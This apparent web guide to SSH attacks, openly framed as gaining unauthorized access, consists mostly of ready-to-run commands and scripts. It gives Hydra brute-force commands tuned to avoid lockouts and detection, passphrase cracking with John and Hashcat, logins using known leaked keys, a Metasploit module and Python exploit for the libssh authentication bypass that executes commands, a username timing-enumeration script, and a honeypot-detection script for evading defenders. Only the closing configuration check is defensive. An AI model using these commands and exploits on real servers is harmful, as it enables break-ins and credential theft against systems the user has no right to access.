Comprehensive guide to SSH penetration testing techniques for gaining unauthorized access to SSH servers
hydra -l username -P /path/to/wordlist.txt ssh://192.168.1.1This command attempts to crack the password for a specific username using a wordlist.
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt ssh://192.168.1.1This command attempts to crack passwords for multiple usernames using a wordlist.
hydra -l username -P /path/to/wordlist.txt ssh://192.168.1.1:2222This command targets SSH running on a non-standard port (2222).
hydra -v -l username -P /path/to/wordlist.txt ssh://192.168.1.1This command provides verbose output during the attack.
hydra -t 4 -l username -P /path/to/wordlist.txt ssh://192.168.1.1This command limits the number of parallel tasks to 4, which can help avoid detection or lockouts.
# Convert SSH private key to John format ssh2john id_rsa > id_rsa.hash # Crack the key with John john --wordlist=/path/to/wordlist.txt id_rsa.hashThese commands convert an SSH private key to a format that John the Ripper can crack, then attempt to crack the passphrase.
# Convert SSH private key to Hashcat format python ssh2hashcat.py id_rsa > id_rsa.hash # Crack the key with Hashcat hashcat -m 22921 -a 0 id_rsa.hash /path/to/wordlist.txtThese commands convert an SSH private key to a format that Hashcat can crack, then attempt to crack the passphrase.
# Set correct permissions on the private key chmod 600 id_rsa # Use the key to authenticate ssh -i id_rsa username@192.168.1.1These commands set the correct permissions on a private key and use it to authenticate to an SSH server.
Some SSH keys may be vulnerable due to weak random number generators or predictable patterns. Tools like RsaCtfTool can attempt to recover private keys from public keys in certain cases:
python RsaCtfTool.py --publickey id_rsa.pub --privateThe SSH Bad Keys repository is a collection of static SSH keys (both public and private) that have made their way into software and hardware products. These known vulnerable keys can be used in penetration testing:
# Clone the SSH Bad Keys repository git clone https://github.com/PopLabSec/ssh-badkeys.git cd ssh-badkeys # Check for known vulnerable authorized keys grep -f authorized/[key_file] ~/.ssh/authorized_keys # Try to authenticate using known private keys ssh -i host/[private_key_file] user@targetThe repository contains two categories of keys: authorized keys (which can be used to gain access to a device) and host keys (which can be used to conduct MITM attacks). If a target system uses any of these known keys, it may be vulnerable to unauthorized access or impersonation attacks.
libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 contain an authentication bypass vulnerability that allows an attacker to authenticate without credentials.
# Using Metasploit use auxiliary/scanner/ssh/libssh_auth_bypass set RHOSTS 192.168.1.1 set RPORT 22 run#!/usr/bin/env python3
import socket
import paramiko
import sys
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} target_host port")
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket()
sock.connect((host, port))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
channel = transport.open_session()
channel.exec_command('whoami')
output = channel.recv(1024).decode()
print(f"Command output: {output}")
channel.close()
transport.close()
sock.close()This Python script exploits the libssh authentication bypass vulnerability to execute commands on the target server.
Some SSH servers may respond differently (in terms of timing) when a valid username is provided versus an invalid one, or when a valid password is provided for a valid username versus an invalid password.
#!/usr/bin/env python3
import paramiko
import time
import sys
def ssh_timing_attack(host, port, username, password):
start_time = time.time()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, port=port, username=username, password=password, timeout=5)
ssh.close()
return True, time.time() - start_time
except paramiko.AuthenticationException:
return False, time.time() - start_time
except Exception as e:
print("Error:", e)
return False, -1
def main():
if len(sys.argv) != 3:
print("Usage:", sys.argv[0], "target_host username")
sys.exit(1)
host = sys.argv[1]
username = sys.argv[2]
port = 22
# Test with invalid username
invalid_username = "invalid_user_" + str(int(time.time()))
print("Testing with invalid username:", invalid_username)
_, invalid_time = ssh_timing_attack(host, port, invalid_username, "password")
# Test with valid username but invalid password
print("Testing with valid username:", username)
_, valid_time = ssh_timing_attack(host, port, username, "password")
print("Invalid username response time: {{:.6f}} seconds".format(invalid_time))
print("Valid username response time: {{:.6f}} seconds".format(valid_time))
if abs(valid_time - invalid_time) > 0.5:
print("[+] Timing difference detected! The server may be vulnerable to timing attacks.")
else:
print("[-] No significant timing difference detected.")
if __name__ == "__main__":
main()This Python script performs a timing attack against an SSH server to detect if it responds differently to valid versus invalid usernames.
Some organizations deploy SSH honeypots to detect and track attackers. This script attempts to identify potential SSH honeypots based on various characteristics.
#!/usr/bin/env python3
import paramiko
import socket
import sys
import time
def check_honeypot(host, port=22):
# Check 1: Banner analysis
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
banner = sock.recv(1024).decode('utf-8').strip()
sock.close()
print("SSH Banner:", banner)
# Check for common honeypot banners
honeypot_banners = ["OpenSSH 6.7p1 Debian 5+deb8u3", "SSH-2.0-OpenSSH_5.1p1 Debian-5"]
if banner in honeypot_banners:
print("[!] Suspicious banner detected (known honeypot banner)")
except Exception as e:
print("Error checking banner:", e)
# Check 2: Authentication delay
try:
start_time = time.time()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, port=port, username="admin", password="admin", timeout=5)
except:
pass
auth_time = time.time() - start_time
print("Authentication time: {{:.2f}} seconds".format(auth_time))
if auth_time < 0.1:
print("[!] Suspiciously fast authentication response (possible honeypot)")
except Exception as e:
print("Error checking authentication delay:", e)
# Check 3: Supported algorithms
try:
transport = paramiko.Transport((host, port))
transport.start_client()
kex_algorithms = transport.get_security_options().kex
ciphers = transport.get_security_options().ciphers
print("Key exchange algorithms:", kex_algorithms)
print("Ciphers:", ciphers)
if len(kex_algorithms) < 5 or len(ciphers) < 5:
print("[!] Limited algorithm support (possible honeypot)")
transport.close()
except Exception as e:
print("Error checking algorithms:", e)
def main():
if len(sys.argv) != 2:
print("Usage:", sys.argv[0], "target_host")
sys.exit(1)
host = sys.argv[1]
check_honeypot(host)
if __name__ == "__main__":
main()This Python script attempts to identify potential SSH honeypots based on various characteristics such as banner analysis, authentication delay, and supported algorithms.
This script analyzes an SSH server's configuration to identify potential security issues.
#!/usr/bin/env python3
import paramiko
import socket
import sys
def analyze_ssh_config(host, port=22):
results = {
"host": host,
"port": port,
"banner": None,
"key_exchange": [],
"ciphers": [],
"macs": [],
"auth_methods": [],
"issues": []
}
# Get SSH banner
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
results["banner"] = sock.recv(1024).decode('utf-8').strip()
sock.close()
except Exception as e:
print("Error getting banner:", e)
# Get supported algorithms
try:
transport = paramiko.Transport((host, port))
transport.start_client()
results["key_exchange"] = transport.get_security_options().kex
results["ciphers"] = transport.get_security_options().ciphers
results["macs"] = transport.get_security_options().macs
transport.close()
except Exception as e:
print("Error getting algorithms:", e)
# Check for weak key exchange algorithms
weak_kex = ["diffie-hellman-group1-sha1", "diffie-hellman-group-exchange-sha1"]
for kex in weak_kex:
if kex in results["key_exchange"]:
results["issues"].append("Weak key exchange algorithm: " + kex)
# Check for weak ciphers
weak_ciphers = ["aes128-cbc", "aes192-cbc", "aes256-cbc", "blowfish-cbc", "3des-cbc"]
for cipher in weak_ciphers:
if cipher in results["ciphers"]:
results["issues"].append("Weak cipher: " + cipher)
# Check for weak MACs
weak_macs = ["hmac-md5", "hmac-sha1", "hmac-md5-96", "hmac-sha1-96"]
for mac in weak_macs:
if mac in results["macs"]:
results["issues"].append("Weak MAC: " + mac)
# Print results
print("SSH Configuration Analysis for {}:{}".format(host, port))
print("Banner:", results["banner"])
print("Key Exchange Algorithms:", ", ".join(results["key_exchange"]))
print("Ciphers:", ", ".join(results["ciphers"]))
print("MACs:", ", ".join(results["macs"]))
if results["issues"]:
print("\nSecurity Issues:")
for issue in results["issues"]:
print("-", issue)
else:
print("\nNo security issues found.")
def main():
if len(sys.argv) != 2:
print("Usage:", sys.argv[0], "target_host")
sys.exit(1)
host = sys.argv[1]
analyze_ssh_config(host)
if __name__ == "__main__":
main()This Python script analyzes an SSH server's configuration to identify potential security issues such as weak key exchange algorithms, ciphers, and MACs.
Techniques for privilege escalation and maintaining access after initial compromise
Learn more